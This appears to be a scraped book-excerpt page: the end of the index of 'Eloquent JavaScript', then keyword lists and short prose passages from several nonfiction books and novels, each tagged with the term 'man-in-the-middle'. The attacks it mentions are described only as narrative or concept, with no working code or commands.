374, 380 querySelector method, 240, 417 querySelectorAll method, 239, 324 question mark, 18, 148, 157, 314 queue, 198 quotation mark, 14, 165 quoting in JSON, 77 of object properties, 63 quoting style (exercise), 165, 413 R rabbit example, 98, 100–102 radians, 242, 293, 298 radio buttons, 318, 323 radius, 350, 423 radix, 11 raising (exceptions), 135 random numbers, 75, 271 random-item package, 414 randomPick function, 122 randomRobot function, 122 range, 88, 147, 148 range function, 5, 78, 409 Range header, 316 ray tracer, 306 readability, 4, 5, 35, 50, 54, 135, 167, 208, 276, 307 readable stream, 361, 362, 364, 378 readAsDataURL method, 345 readAsText method, 326 readdir function, 359, 366, 425 readdirSync function, 425 read-eval-print loop, 354 readFile function, 172, 358, 425 readFileSync function, 359, 424 reading code, 6, 117 readStorage function, 184 readStream function, 378, 379 real-time events, 247 reasoning, 17 recipe analogy, 84 record, 62 rect (SVG tag), 288 rectangle, 266, 278, 289, 307, 342 rectangle function, 342, 423 recursion, 47, 50, 56, 80, 189, 195, 205, 206, 208, 231, 243, 300, 394, 408, 410, 413, 416, 418 reduce method, 89, 91, 94, 95, 340, 411 redundancy, 397 ReferenceError type, 215 RegExp class, 146, 157, 424 regexp golf (exercise), 164 regular expressions, 145–165, 206, 368, 375, 376, 417, 424 alternatives, 152 backtracking, 153 boundary, 151 creation, 146, 157 escaping, 146, 158, 414 flags, 149, 155, 157, 414 global, 155, 158, 159 grouping, 149, 155 internationalization, 162 matching, 152, 158 methods, 146, 150, 158 repetition, 148 rejecting (a promise), 187, 189, 198 relative path, 172, 224, 355, 363, 425 relative positioning, 240, 241 relative URL, 315 remainder (modulo) operator, 14, 33, 297, 407, 408, 418, 420 remote access, 363 remote procedure call, 316 removeChild method, 232 removeEventListener method, 248, 419 removeItem method, 326 rename function, 359 rendering, 289 renderTalk function, 384 renderTalkForm function, 385 renderUserField function, 383 repeat method, 73, 257 repeating key, 251 repetition, 52, 148, 154, 157, 260 replace method, 155, 165, 413 replaceChild method, 233, 418 replaceSelection function, 322 reportError function, 383 repulsion, 393, 395 request, 185, 189, 220, 312, 313, 321, 360, 361, 367, 372 request function, 189, 361, 362 request type, 185 requestAnimationFrame function, 241, 258, 260, 283, 308, 418 requestType function, 190 require function, 171, 172, 178, 355, 356, 365, 375 reserved words, 26 resolution, 172, 355 resolve function, 364 resolving (a promise), 186, 187, 189, 198 resource, 220, 221, 312, 313, 317, 363, 377 response, 185, 189, 312, 313, 316, 360, 364, 366 Response class, 315 responsiveness, 247, 353, rest parameters, 74 restore method, 299, 300 result property, 326 retry, 189 return keyword, 42, 47, 101, 196, 408, 411 return value, 27, 42, 134, 185, 410 reuse, 54, 112, 167–169, 356 reverse method, 79 reversing (exercise), 79, 409 rgb (CSS), 274 right-aligning, 243 rmdir function, 366, 368 roadGraph object, 118 roads array, 117 roads module (exercise), 177, 415 robot, 117, 119, 121, 123, 125, 177 robot efficiency (exercise), 125, 412 robustness, 373 root, 229 rotate method, 298, 300 rotation, 307, 420 rounding, 76, 134, 278, 279, 302, 424 router, 372, 375 Router class, 375, 376 routeRequest function, 194 routeRobot function, 123 routing, 192 rows, in tables, 243 Ruby, 391 rules (CSS), 238, 239 run function, 211 runAnimation function, 283, 285 runGame function, 284, 285 runLayout function, 396 runLevel function, 283, 285 running code, 7 runRobot function, 121, 412 run-time error, 132–134, 140, 417 Rust (programming language), 391 S Safari, 225 sandbox, 7, 59, 224, 227, 316 save method, 299, 300 SaveButton class, 344 scalar replacement of aggregates, 400, 402 scale constant, 337–339 scale method, 297, 299 scaling, 273, 296, 297, 303, 421 scalpel (exercise), 200, 416 scheduling, 197, 354 scientific notation, 13, 165 scope, 43, 44, 48, 168, 170–173, 208, 210, 214, 215, 417 script (HTML tag), 223, 224, 258 SCRIPTS data set, 87, 89, 92, 93, 95 scroll event, 256, 260 scrolling, 251, 256–257, 275–276, 282, 301 search method, 158 search problem, 124, 152, 154, 232, 368, 405 search tool (exercise), 368, 424 section, 161 Secure HTTP, 221, 317, 361 security, 224, 225, 316, 317, 325, 327, 364, 375 select (HTML tag), 319, 324, 327, 334, 340, 425 selected attribute, 324 selection, 322 selectionEnd property, 322 selectionStart property, 322 selector, 239 self-closing tag, 222 semantic versioning, 357 semicolon, 23, 24, 33, 237 send method, 185, 188 sendGossip function, 191 sep binding, 364–365 sequence, 148 serialization, 77 server, 220, 221, 311–313, 315, 316, 353, 360, 362, 363, 372, 375 session, 328 sessionStorage object, 328 set, 146, 147, 229 Set (data structure), 113, 126 Set class, 113, 126, 413 set method, 105 setAttribute method, 235, 337 setInterval function, 260, 296 setItem method, 326 setter, 110 setTimeout function, 184, 197, 259, 260, 380, 386 shape, 287, 290, 291, 293, 295, 307 shapes (exercise), 307, 420 shared property, 100, 103 SHIFT key, 252, 423 shift method, 71 shiftKey property, 252 short-circuit evaluation, 20, 51, 209, 411 SICP, 202 side effect, 24, 27, 34, 42, 54, 65, 79, 88, 159, 175, 199, 230, 232, 233, 236, 290, 299, 314, 334, 335 sign, 12, 165, 414 sign bit, 12 signal, 11 simplicity, 213 simulation, 119, 121, 265, 270, 330, 393, 418 sine, 75, 241, 271, 281 single-quote character, 14, 165, 224 singleton, 126 skill, 333 SkillShareApp class, 386 skill-sharing project, 371–373, 375, 381 skipSpace function, 206, 214 slash character, 13, 35–36, 146, 156, 315, 364, 425 slice method, 72, 73, 88, 233, 409, 416 slope, 424 sloppy programming, 261 smooth animation, 241 SMTP, 220 social factors, 349 socket, 372–373 some method, 92, 95, 191, 376, 426 sorting, 229 source property, 158 special form, 203, 208 special return value, 134, 135 specialForms object, 208 specificity, 239 speed, 1, 2, 308, 421 SpiderMonkey, 400 spiral, 307, 420 split method, 118, 268 spread, 74, 336 spread operator, 274 spring, 393, 395 sprite, 296, 303–304 spy, 256 square, 28 square brackets, 60, 61, 74, 76, 107, 147, 324, 328, 409 square example, 41–42, 45, 46 square root, 68, 75, 411 src attribute, 222, 224 stack, see call stack stack overflow, 47, 50, 56, 408 stack trace, 136 staged compilation, 392 standard, 5, 26, 35, 88, 136, 162, 349, 354, 355 standard environment, 26 standard output, 354, 362–363 standards, 219, 225 star, 307, 420 Star Trek insignia, 292 startPixelEditor function, 347 startState constant, 347 startsWith method, 364 stat function, 359, 365, 366, 425 state of application, 275, 334, 342, 346, 347, 388 in binding, 24, 31, 32, 34, 400 of canvas, 289, 299 in iterator, 197 in objects, 119, 268, 301 transitions, 198, 336, 337 statement, 23, 24, 28, 31, 32, 42, 63 static (reserved word), 26 static file, 373, 376 static method, 110, 113, 268, 413 static typing, 403 Stats type, 366 statSync function, 425 status code, 312, 354–355 status property, 315, 383 stdout property, 362–363 stopPropagation method, 250 storage function, 187 stream, 220, 361–363, 364, 367, 378 strict mode, 130 string, 14, 60, 62, 65, 92 indexing, 56, 72, 74, 92, 149 length, 37, 92 methods, 73, 149 notation, 14 properties, 72 representation, 15 searching, 73 String function, 28, 105 stroke method, 290–292 strokeRect method, 289, 421 strokeStyle property, 290 strokeText method, 295 stroking, 289, 290, 295, 306 strong (HTML tag), 235, 237 structure, 168, 222, 227, 334 Structure and Interpretation of Computer Programs, 202 structure sharing, 79 style, 237 style (HTML tag), 238, 239 style attribute, 237–239, 273 style sheet, see CSS subclass, 111 submit, 318, 320, 321 submit event, 321, 384, 425 substitution, 54 subtraction, 13, 113 sum function, 5, 78 summing (exercise), 78, 409 summing example, 4, 83, 89, 211 superclass, 111 survey, 294 Sussman, Gerald, 202 SVG, 287–289, 305, 306 swapping bindings, 424 swipe, 342 switch keyword, 34 symbiotic relationship, 183 symbol, 106 Symbol function, 106 Symbol.iterator symbol, 107 SymmetricMatrix class, 111 synchronization, 387, 426 synchronous programming, 182, 195, 359, 368 syncState method, 335, 338, 340, 341, 349, 426 syntax of Egg, 203, 204 error, 26, 129, 130 expression, 23 function, 42, 45 identifier, 26 number, 12, 165 object, 63 operator, 13 statement, 24, 26, 28–34, 135 string, 14 syntax tree, 204–205, 207, 228–229 SyntaxError type, 206 T tab character, 14, 32 TAB key, 320 tabbed interface (exercise), 262, 419 tabindex attribute, 252, 320, 349 table (HTML tag), 243, 266, 274, 422 table example, 417 tableFor function, 68 tables, 67, 68, 274 tags, 221–222, 227, 239, see also names of specific tags talk, 371, 372, 377–379 talkResponse method, 380 talksAbout function, 231 talkURL function, 383 Tamil, 87 tampering, 317 tangent, 75 target property, 250 task management example, 71 TCP, 220, 221, 311, 373 td (HTML tag), 243, 274 Tef, 166 temperature example, 110 template, 171, 388, 426 template literals, 15 tentacle (analogy), 25, 63, 65 terminal, 354 termite, 183 ternary operator, 18, 20, 209 test method, 146 test runners, 132 test suites, 132 testing, 125, 132 text, 14, 221, 222, 227, 229, 295, 305–307, 322, 324, 358, 422 text field, 257, 318, 319, 322 text method, 315 text node, 229, 231, 233, 419 text wrapping, 305 text-align (CSS), 243 textAlign property, 295, 420 textarea (HTML tag), 260, 318, 322, 327, 330, 425 textBaseline property, 295, 420 textContent property, 418, 422 TEXT_NODE code, 229, 419 textScripts function, 94, 411 th (HTML tag), 243 then method, 186–188, 191, 416 theory, 133 this binding, 62, 98–99, 101, 130 thread, 182, 183, 198, 259 throw keyword, 135, 136, 139, 141, 413 tile, 303 time, 147, 148, 150, 184, 241, 261, 277, 278, 280, 283, 303, 346 time zone, 150 timeline, 182, 197, 223, 241, 247, 258 timeout, 188, 259, 373, 374, 380 Timeout class, 189 times method, 269 timing, 396 title, 382 title (HTML tag), 222, 223 toDataURL method, 344 toLowerCase method, 62, 243 tool, 145, 164, 175, 334, 339, 340, 342–344, 347, 350, 357 tool property, 335 ToolSelect class, 340 top (CSS), 240–242, 244 top-level scope, see global scope toString method, 99, 100, 103–105, 346, 362 touch, 255, 334 touchend event, 255 touches method, 278 touches property, 255, 339 touchmove event, 255, 339, 350 touchstart event, 255, 337, 339 toUpperCase method, 62, 132, 243, 362 tr (HTML tag), 243, 274 trackKeys function, 282, 285 transform (CSS), 287 transformation, 297–299, 308, 420 translate method, 298, 299 Transmission Control Protocol, 220, 221, 311, 373 transparency, 289, 296, 346 transpilation, 213 trapezoid, 307, 420 traversal, 152 tree, 100, 204, 229 treeGraph function, 394 trial and error, 133, 282, 293 triangle (exercise), 37, 407 trigonometry, 75, 241 trim method, 73, 268 true, 16 trust, 224 try keyword, 136, 137, 190, 413, 422 type, 12, 16, 112 type attribute, 318, 321 type checking, 131, 174 type coercion, 18, 19, 28 type observation, 392, 401, 403 type property, 204, 249 type variable, 131 typeof operator, 16, 80, 410 TypeScript, 131–132 typing, 260 typo, 129 U Ullman, Ellen, xx unary operator, 16, 23 uncaught exception, 138, 188 undefined, 18, 19, 25, 42, 47, 61, 63, 77, 129, 130, 134 underline, 237 underscore character, 26, 35, 98, 151, 157 undo history, 346, 347 UndoButton class, 347 Unicode, 15, 17, 87, 92, 147, 162, 163 unicycling, 371 Uniform Resource Locator, see URL uniformity, 204 uniqueness, 239 unit (CSS), 242, 257 Unix, 366–368 Unix time, 150 unlink function, 359, 366 unshift method, 71 unwinding the stack, 135 upcasing server example, 362 updated method, 378, 381, 425 updateState function, 336 upgrading, 169 upload, 325 URL, 221, 224, 288, 313, 315, 317, 360, 373, 383 URL encoding, 314 url package, 364, 380 urlToPath function, 364 usability, 251 use strict, 130 user experience, 247, 320, 372, 383 user interface, 138, 334 users’ group, 371 UTF-8, 358, 359 UTF-16, 15, 92 V V8, 398 validation, 134, 140, 203, 277, 321, 378, 379 value, 12, 186 value attribute, 318, 322, 324 var keyword, 25, 43, 76 variables, see also binding Vec class, 113, 268, 269, 280, 394, 396, 421 vector, 394, 400 vector (exercise), 113, 411 vector graphics, 295 verbosity, 46, 182 version, 169, 222, 312, 357, 398 viewport, 275–277, 301, 302, 305 VillageState class, 119 virtual keyboard, 252 virtual world, 117, 119, 121 virus, 224 vocabulary, 41, 84 void operator, 26 volatile data storage, 12 W waitForChanges method, 380 waiting, 184 walking, 303 warning, 357 wave, 271, 280, 281 web, see World Wide Web web application, 5, 326, 333 web browser, see browser web page, 174 web worker, 259 WebDAV, 369 webgl (canvas context), 289 website, 224, 225, 313, 353, 369, 371 WebSockets, 373 weekDay module, 169–170 weekend project, 369 weresquirrel example, 60, 62, 64, 66, 69, 71 while loop, 4, 30, 32, 53, 160 whitespace in HTML, 231, 340, 419 indentation, 32 matching, 147, 162 syntax, 204, 206, 214, 417 trimming, 73, 268 in URLs, 373–374 Why’s (Poignant) Guide to Ruby, 22 width property, 350, 423 window, 250, 255, 258 window object, 248 with statement, 131 word boundary, 151 word character, 147, 151, 162 work list, 124, 343 workbench (exercise), 330, 422 world, of a game, 265 World Wide Web, 5, 77, 219, 221, 224, 225, 311 writable stream, 360–363, 364 write method, 360, 361 writeFile function, 359, 361, 425 writeHead method, 360 writing code, 6, 117 writing system, 87 WWW, see World Wide Web X XML, 230, 288 XML namespace, 288 xmlns attribute, 288 Y yield (reserved word), 26 yield keyword, 197 your own loop (example), 95 Yuan-Ma, 10, 352 Z Zawinski, Jamie, 144 zero-based counting, 56, 61, 150 zeroPad function, 54 zigzag shape, 420 zooming, 305 Eloquent JavaScript, 3rd Edition is set in New Baskerville, Futura, Dogma, and TheSansMono Condensed.


Crypto: How the Code Rebels Beat the Government Saving Privacy in the Digital Age by Steven Levy

Albert Einstein, Claude Shannon: information theory, cognitive dissonance, computer age, Donald Knuth, Eratosthenes, Extropian, invention of the telegraph, John Markoff, Kevin Kelly, knapsack problem, Marc Andreessen, Mitch Kapor, MITM: man-in-the-middle, Network effects, new economy, NP-complete, Ronald Reagan, Saturday Night Live, Silicon Valley, Simon Singh, Stephen Hawking, Steven Levy, Watson beat the top human players on Jeopardy!, web of trust, Whole Earth Catalog, zero-sum game, Zimmermann PGP, éminence grise

The classic conundrum in such systems arises when Alice wants to send something to Bob. She scrambles it with Bob’s public key, and only Bob can unscramble it. But what if Alice has never met Bob—how does she get his public key? If she asks him for it directly, she can’t encode her request (obviously not, because she doesn’t have his public key yet, which she would use to encrypt the message). So a potential eavesdropper, Eve, could act as “a man in the middle,” and snatch that message en route. Then Eve, pretending to be Bob, could send her own public key to Alice, falsely representing it as Bob’s key. (This deceptive masquerade is known as “spoofing.”) If Alice is duped, she’ll encode her secret message to Bob with the key. Alas, Bob won’t be able to read anything scrambled with that key—only tricky Eve can. So much for the security of direct requests.


Reaganland: America's Right Turn 1976-1980 by Rick Perlstein

"Robert Solow", 8-hour work day, affirmative action, airline deregulation, Alistair Cooke, American Legislative Exchange Council, anti-communist, Ayatollah Khomeini, Berlin Wall, Bernie Sanders, Brewster Kahle, business climate, clean water, collective bargaining, colonial rule, COVID-19, Covid-19, creative destruction, crowdsourcing, cuban missile crisis, currency peg, death of newspapers, defense in depth, Deng Xiaoping, desegregation, Donald Trump, energy security, equal pay for equal work, facts on the ground, feminist movement, financial deregulation, full employment, global village, Golden Gate Park, illegal immigration, In Cold Blood by Truman Capote, index card, indoor plumbing, Internet Archive, invisible hand, Julian Assange, Kitchen Debate, kremlinology, land reform, Marshall McLuhan, mass immigration, MITM: man-in-the-middle, Monroe Doctrine, moral panic, mutually assured destruction, New Journalism, oil shock, open borders, Potemkin village, price stability, Ralph Nader, RAND corporation, rent control, road to serfdom, Robert Bork, rolodex, Ronald Reagan, Rosa Parks, Saturday Night Live, Silicon Valley, traveling salesman, unemployed young men, union organizing, unpaid internship, Unsafe at Any Speed, Upton Sinclair, upwardly mobile, urban decay, urban planning, urban renewal, wages for housework, walking around money, War on Poverty, white flight, WikiLeaks, Winter of Discontent, yellow journalism, Yom Kippur War, zero-sum game

guns at Pearl Harbor Thomas W. Cutrer and T. Michael Parrish, “How Dorie Miller’s Bravery Helped Fight Navy Racism,” World War II Magazine, October 31, 2019. “like overripe fruit” Richard Reeves, President Reagan: The Triumph of Imagination (New York: Simon & Schuster, 2005), 154; Robert Welch, The Blue Book of the John Birch Society (Belmont, MA: Western Islands, 1961) 11. “You remember Nancy” Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 155. prospects of Jack Kemp ENIR, July 24, 1978. “Maybe it wouldn’t” Los Angeles Times Service, December 7, 1976. dinner at Stanford George Schultz, Turmoil and Triumph: My Years as Secretary of State (New York: Scribner, 1993). Bohemian Grove July 28, 1978, RRPL, Box 59. first day back July 31, 1978, ibid. margin of 37 to 31 percent George Gallup column, August 13, 1978.

Panhandle of West Virginia AP, July 13, 1979. The Pittsburgh Press’s article “Here’s Partial List of Open Stations,” “How Carter’s Carnegie Visit Was Kept a Secret,” “Violence Threatened If Fuel Redistributed,” “Carter, Residents Hold Mini-Summit,” all on page A-4, Pittsburgh Press, July 13, 1979. “They were pleased” Carter, White House Diary, 343. “almost frightening” Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 136. Then came a final meeting Gordon Stewart, “Carter’s Speech Therapy,” NYT, July 14, 1979; Schlesinger, White House Ghosts, 302. Camp David movie theater Schlesinger, White House Ghosts, 303–4; Hendrik Hertzberg, “A Very Merry Malaise,” NewYorker.com, July 17, 2009. “Inside ten minutes” Jules Witcover and Jack Germond, Blue Smoke and Mirrors: How Reagan Won and Why Carter Lost the Election of 1980 (New York: Viking, 1981), 30.

“DC-10s have replaced” RRB 79-09, track A4, “Nuclear Power,” recorded June 29, 1979, RPV, 454. wandering into staff meetings See n.d. notes, early 9/79, page 8, “No nation can survive under fiat money”; “Meeting on Public Policy Issues,” September 6, 1979; both RRPL, Box 103, “Meetings—9/1979” folder. See also PH, Box 11, Fred Iklé, for working drafts of fall 1979 policy position statements. Germond was skeptical Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 150–52. vituperation directed at Jackson Ian Shapiro, The Last Great Senate: Courage and Statesmanship in Times of Crisis (New York: Public Affairs Books, 2012), 292. North American Aerospace Defense Command July 30 and July 31, 1979, schedule, RRPL, Box 76; Frances FitzGerald, Way Out There in the Blue: Reagan, Star Wars, and the End of the Cold War (New York: Simon & Schuster, 2000), 20–21; Robert Scheer, With Enough Shovels: Reagan, Bush, and Nuclear War (New York: Random House, 1982), 104, 232.


pages: 478 words: 149,810

We Are Anonymous: Inside the Hacker World of LulzSec, Anonymous, and the Global Cyber Insurgency by Parmy Olson

4chan, Asperger Syndrome, bitcoin, call centre, Chelsea Manning, corporate governance, crowdsourcing, Firefox, hive mind, Julian Assange, Minecraft, MITM: man-in-the-middle, Occupy movement, peer-to-peer, pirate software, side project, Skype, speech recognition, Stephen Hawking, Stuxnet, We are Anonymous. We are Legion, We are the 99%, web application, WikiLeaks, zero day

My own observation of DigitalGangsters.com showed posts advertising jobs that required hacking into websites via SQL injection, stealing databases of names and e-mail addresses, or just stealing addresses and sending them to spammers. A database with passwords was worth more, since spammers could then send spam from legitimate addresses. Occasionally a thread would start with a post seeking “freelancers” who could program in C, Objective-C, C#, VB, Java, and JavaScript. One post from June of 2010 had the title “DGs [Digital Gangsters] in Washington? Be my mail man in the middle,” followed by: “Heres how it works. A delivery gets shipped to your address, You open the package remove item, Reship the item to me in a new container with a false return address. when item arrives you get paid. interested?” The description of Jin-Soo Byun was sourced from interviews with Jennifer Emick and Laurelai Bailey; the note that Aaron Barr was helping her investigation was sourced from an interview with Barr.


pages: 489 words: 148,885

Accelerando by Stross, Charles

business cycle, call centre, carbon-based life, cellular automata, cognitive dissonance, commoditize, Conway's Game of Life, dark matter, dumpster diving, Extropian, finite state, Flynn Effect, glass ceiling, gravity well, John von Neumann, Kickstarter, knapsack problem, Kuiper Belt, Magellanic Cloud, mandelbrot fractal, market bubble, means of production, MITM: man-in-the-middle, orbital mechanics / astrodynamics, packet switching, performance metric, phenotype, planetary scale, Pluto: dwarf planet, reversible computing, Richard Stallman, SETI@home, Silicon Valley, Singularitarianism, slashdot, South China Sea, stem cell, technological singularity, telepresence, The Chicago School, theory of mind, Turing complete, Turing machine, Turing test, upwardly mobile, Vernor Vinge, Von Neumann architecture, web of trust, Y2K, zero-sum game

So after a distracted irritated fit of play – which leaves the toyspace in total disarray, Sendak-things cowering under a big bass drum – Manni gets bored. And because he's still basically a little kid, and not fully in control of his own metaprogramming, instead of adjusting his outlook so that he isn't bored anymore, he sneaks out through his bedroom gate (which big-Manni-ghost reprogrammed for him sometime ago so that it would forward to an underused public A-gate that he'd run a man-in-the-middle hack on, so he could use it as a proxy teleport server) then down to the underside of Red Plaza, where skinless things gibber and howl at their tormentors, broken angels are crucified on the pillars that hold up the sky, and gangs of semiferal children act out their psychotic fantasies on mouthless android replicas of parents and authorities. Lis is there, and Vipul and Kareen and Morgan.


pages: 537 words: 149,628

Ghost Fleet: A Novel of the Next World War by P. W. Singer, August Cole

3D printing, Admiral Zheng, augmented reality, British Empire, digital map, energy security, Firefox, glass ceiling, global reserve currency, Google Earth, Google Glasses, IFF: identification friend or foe, Just-in-time delivery, low earth orbit, Maui Hawaii, MITM: man-in-the-middle, new economy, old-boy network, RAND corporation, reserve currency, RFID, Silicon Valley, Silicon Valley startup, South China Sea, sovereign wealth fund, stealth mode startup, trade route, Wall-E, We are Anonymous. We are Legion, WikiLeaks, zero day, zero-sum game

At the elevator door, the commandos stood in silence. Wang wondered where they would take him next. Then he noticed that they were tensing up as the elevator lights numbered ever closer to their floor. The door opened and another armed phalanx emerged; these bodyguards were Caucasian in ethnicity and wearing civilian suits, but they were clearly military. While the two groups eyed each other warily, Wang watched how the elderly man in the middle didn’t bother even to look up from the outdated computer tablet he tapped away on. Red diamonds and purple hearts reflected in his traditional eyeglasses. He was surprisingly fit for his age, but supposedly the old Russian spy was addicted to memory-improving games, an effort to stave off what Directorate intelligence suspected was dementia. A strong body still, but not the mind. So, Wang realized, this had not been a strategy session but an audition.


pages: 559 words: 155,372

Chaos Monkeys: Obscene Fortune and Random Failure in Silicon Valley by Antonio Garcia Martinez

Airbnb, airport security, always be closing, Amazon Web Services, Burning Man, Celtic Tiger, centralized clearinghouse, cognitive dissonance, collective bargaining, corporate governance, Credit Default Swap, crowdsourcing, death of newspapers, disruptive innovation, drone strike, El Camino Real, Elon Musk, Emanuel Derman, financial independence, global supply chain, Goldman Sachs: Vampire Squid, hive mind, income inequality, information asymmetry, interest rate swap, intermodal, Jeff Bezos, Kickstarter, Malcom McLean invented shipping containers, Marc Andreessen, Mark Zuckerberg, Maui Hawaii, means of production, Menlo Park, minimum viable product, MITM: man-in-the-middle, move fast and break things, move fast and break things, Network effects, orbital mechanics / astrodynamics, Paul Graham, performance metric, Peter Thiel, Ponzi scheme, pre–internet, Ralph Waldo Emerson, random walk, Ruby on Rails, Sam Altman, Sand Hill Road, Scientific racism, second-price auction, self-driving car, Silicon Valley, Silicon Valley startup, Skype, Snapchat, social graph, social web, Socratic dialogue, source of truth, Steve Jobs, telemarketer, undersea cable, urban renewal, Y Combinator, zero-sum game, éminence grise

If my reading of YC’s and Paul Graham’s essays was correct, then bomb-throwing anarchist subversive mixed with cold-blooded execution mixed with irreverent whimsy, a sort of technology-enabled twelve-year-old boy, was precisely the YC entrepreneur profile. Figure out a point of overlooked business or technical leverage, interpose some piece of cleverness, and gleefully marvel at the resulting disruption (or destruction). In that spirit did we respond to my favorite question on the YC application:* What (non-computer) system have you ever hacked? I conducted a man-in-the-middle attack on Craigslist’s online dating ads. I posted an ad as a woman looking for a man, and as a man looking for a woman. I’d pass email from real man to fictional woman as the replies of fictional man to the real women, and basically crossed the email streams. At one point I shifted each real person off my fictional email addresses, and to the corresponding opposite-sex real email addresses.


What We Cannot Know: Explorations at the Edge of Knowledge by Marcus Du Sautoy

Albert Michelson, Andrew Wiles, Antoine Gombaud: Chevalier de Méré, Arthur Eddington, banking crisis, bet made by Stephen Hawking and Kip Thorne, Black Swan, Brownian motion, clockwork universe, cosmic microwave background, cosmological constant, dark matter, Dmitri Mendeleev, Edmond Halley, Edward Lorenz: Chaos theory, Ernest Rutherford, Georg Cantor, Hans Lippershey, Harvard Computers: women astronomers, Henri Poincaré, invention of the telescope, Isaac Newton, Johannes Kepler, Magellanic Cloud, mandelbrot fractal, MITM: man-in-the-middle, Murray Gell-Mann, music of the spheres, Necker cube, Paul Erdős, Pierre-Simon Laplace, Richard Feynman, Skype, Slavoj Žižek, Solar eclipse in 1919, stem cell, Stephen Hawking, technological singularity, Thales of Miletus, Turing test, wikimedia commons

It takes place on a train (as many things do in relativity). Two people with identical guns are standing at either end of the train. Exactly halfway between them is a third member of the gang. The train is racing through a station. A police officer is watching the scene. Let me first consider the situation on the train. As far as the gang members are concerned, the train can be considered at rest. The guns go off. The bullets hit the man in the middle at the same time. The speed of the bullets and the distance they have to cover is the same, and as far as everyone on the train is concerned the gunmen both shot at the same moment. Indeed, the victim saw light flash from the guns at the same moment, just before being hit by the bullets. But what about the perspective of the police officer? Let’s suppose the victim passes the police officer at precisely the moment both flashes of light reach the victim, so that the police officer witnesses the flashes at the same time too.


Days of Fire: Bush and Cheney in the White House by Peter Baker

addicted to oil, anti-communist, battle of ideas, Berlin Wall, Bernie Madoff, Bob Geldof, buy low sell high, card file, clean water, collective bargaining, cuban missile crisis, desegregation, drone strike, energy security, facts on the ground, failed state, Fall of the Berlin Wall, friendly fire, guest worker program, hiring and firing, housing crisis, illegal immigration, immigration reform, Mikhail Gorbachev, MITM: man-in-the-middle, Robert Bork, Ronald Reagan, Ronald Reagan: Tear down this wall, Saturday Night Live, South China Sea, stem cell, too big to fail, uranium enrichment, War on Poverty, working poor, Yom Kippur War

CHAPTER 17: “WE WERE ALMOST ALL WRONG” 1 “I sure wasn’t going to”: Mary Cheney, Now It’s My Turn, 173–78. 2 “If you feel like you have to”: Ibid. 3 Five picked Gephardt: Gillespie, Winning Right, 51. 4 Jenna dreamed that her father: Thomas and the Staff of Newsweek, Election 2004, xix. 5 “Dean ran an ad with me”: Dick Gephardt, author interview. 6 “He’s done, it’s over”: Matt Schlapp and Dan Bartlett, author interviews. 7 Kerry won with 38 percent: New Hampshire Secretary of State’s office, http://www.sos.nh.gov/presprim2004/dpressum.htm. 8 “Let me begin by saying”: David Kay, testimony before the Senate Armed Services Committee, January 28, 2004, http://www.cnn.com/2004/US/01/28/kay.transcript/. 9 “Why would Saddam do something”: David Kay, author interview. 10 “was the right thing to do”: Colin Powell, interview with the Washington Post, excerpts printed February 3, 2004. 11 “It was something we all”: Barry Schweid, “Powell Says War Decision Was Correct Even If Weapon Stockpiles Did Not Exist,” Associated Press, February 3, 2004. 12 “despite some public statements”: George Tenet, speech at Georgetown University, February 5, 2004, https://www.cia.gov/news-information/speeches-testimony/2004/tenet_georgetownspeech_02052004.html. 13 declined to embrace: Sheryl Stolberg, “White House Avoids Stand on Gay Marriage Measure,” New York Times, July 2, 2003, http://www.nytimes.com/2003/07/02/us/white-house-avoids-stand-on-gay-marriage-measure.html. 14 “heard more about marriage”: Goeglein, Man in the Middle, 120. 15 Bush invited Cheney and top aides: Halperin and Harris, Way to Win, 254–55. 16 “There is a strong sense”: Undated campaign memo, provided to author. 17 “That decision influenced everything”: Matthew Dowd, interview with PBS’s Frontline, January 4, 2005, http://www.pbs.org/wgbh/pages/frontline/shows/architect/interviews/dowd.html. 18 “We have, I reminded him”: Laura Bush, Spoken from the Heart, 302–3. 19 “He brought up the fact”: Dick Cheney, author interview. 20 “Cheney was pissed off”: Cheney friend, author interview. 21 “The union of a man and”: George W.

Gerhart, Ann. The Perfect Wife: The Life and Choices of Laura Bush. New York: Simon & Schuster, 2004. Gerson, Michael J. Heroic Conservatism: Why Republicans Need to Embrace America’s Ideals (and Why They Deserve to Fail if They Don’t). San Francisco: HarperOne, 2007. Gillespie, Ed. Winning Right: Campaign Politics and Conservative Policies. New York: Threshold, 2006. Goeglein, Tim. The Man in the Middle: An Inside Account of Faith and Politics in the George W. Bush Era. Nashville: B&H, 2011. Goldsmith, Jack L. The Terror Presidency: Law and Judgment Inside the Bush Administration. New York: W. W. Norton, 2007. Gordon, Michael, and Bernard E. Trainor. Cobra II: The Inside Story of the Invasion and Occupation of Iraq. New York: Pantheon, 2006. ———. The Endgame: The Hidden History of America’s Struggle to Build Democracy in Iraq.


pages: 598 words: 172,137

Who Stole the American Dream? by Hedrick Smith

Affordable Care Act / Obamacare, Airbus A320, airline deregulation, anti-communist, asset allocation, banking crisis, Bonfire of the Vanities, British Empire, business cycle, business process, clean water, cloud computing, collateralized debt obligation, collective bargaining, commoditize, corporate governance, Credit Default Swap, credit default swaps / collateralized debt obligations, currency manipulation / currency intervention, David Brooks, Deng Xiaoping, desegregation, Double Irish / Dutch Sandwich, family office, full employment, global supply chain, Gordon Gekko, guest worker program, hiring and firing, housing crisis, Howard Zinn, income inequality, index fund, industrial cluster, informal economy, invisible hand, Joseph Schumpeter, Kenneth Rogoff, Kitchen Debate, knowledge economy, knowledge worker, laissez-faire capitalism, late fees, Long Term Capital Management, low cost airline, low cost carrier, manufacturing employment, market fundamentalism, Maui Hawaii, mega-rich, MITM: man-in-the-middle, mortgage debt, negative equity, new economy, Occupy movement, Own Your Own Home, Paul Samuelson, Peter Thiel, Plutonomy: Buying Luxury, Explaining Global Imbalances, Ponzi scheme, Powell Memorandum, Ralph Nader, RAND corporation, Renaissance Technologies, reshoring, rising living standards, Robert Bork, Robert Shiller, Robert Shiller, rolodex, Ronald Reagan, shareholder value, Shenzhen was a fishing village, Silicon Valley, Silicon Valley startup, Steve Jobs, The Chicago School, The Spirit Level, too big to fail, transaction costs, transcontinental railway, union organizing, Unsafe at Any Speed, Vanguard fund, We are the 99%, women in the workforce, working poor, Y2K

